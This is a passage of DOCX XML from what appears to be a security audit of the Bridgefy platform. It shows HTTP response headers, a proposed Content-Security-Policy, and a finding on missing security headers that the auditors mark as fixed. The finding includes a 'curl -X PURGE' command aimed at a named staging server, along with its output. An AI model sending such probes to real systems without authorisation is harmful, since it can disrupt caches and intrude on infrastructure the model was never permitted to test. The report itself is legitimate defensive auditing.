          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-25"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>cache-del21724-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>DEL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>x-cache</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: MISS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="100"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>x-cache-hits</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>x-timer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>S1674317809.262483,VS0,VE264</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>vary</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: x-fh-requested-host, accept-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>encoding</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>alt-svc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>27=":443";ma=86400</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>content-length</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>5579</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="113"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="365"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>It is recommended to implement a CSP Configuration using</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>report-only</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>180</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>mode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>first to ensure all functionality remains working. The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>Google CSP Evaluator </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>website</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>181</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> can then be used to verify potential risks in the CSP settings. A possible CSP configuration that might be considered as a starting point for testing could be the following:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Proposed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>Fix:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="37"/>
        <w:ind w:left="720" w:right="388" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Content-Security-Policy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>default-src</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>self;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>img-src</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>https:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>data:;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>font-src</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'self'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>data:; object-src: 'none'; frame-ancestors 'none'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="81"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_TOC_250014" w:id="41"/>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>BFY-01-042</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>WP2/3:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Weaknesses</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>via</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Absent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Security</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Headers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="FF9900"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Medium</w:t>
      </w:r>
      <w:bookmarkEnd w:id="41"/>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="56"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="372"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Retest Notes: </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Fix Verified. The Bridgefy team resolved this issue and 7ASecurity verified that the fix is valid.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="363"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>A selection of HTTP security headers were confirmed to be absent from a number of servers related to the Bridgefy platform. Even though this does not imply a vulnerability at present, this lack of header integration may assist an attacker to exploit certain weaknesses. This issue can be confirmed with the following commands, which</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>show</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>all HTTP security headers are missing on at least some endpoints on a number of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>staging and production servers:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="582" w:lineRule="exact" w:before="32"/>
        <w:ind w:right="3392"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Example</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>1:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Complete</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>lack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Security</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>headers </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="178" w:lineRule="exact" w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>curl </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>-X PURGE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>https://developer.staging.bridgefy.me -</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="113"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Output:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>HTTP/2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>200</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="31"/>
        <w:ind w:left="720" w:right="6029" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>content-type</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-25"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>application/json </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>fastly-instant-rate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: 0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>accept-ranges</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>bytes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>date</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: Sun, 22 Jan 2023 15:29:22 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GMT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>x-varnish</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>504912106</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>via</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: 1.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>varnish</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>x-served-by</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: cache-del21740-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>DEL</w:t>
      </w:r>
    </w:p>
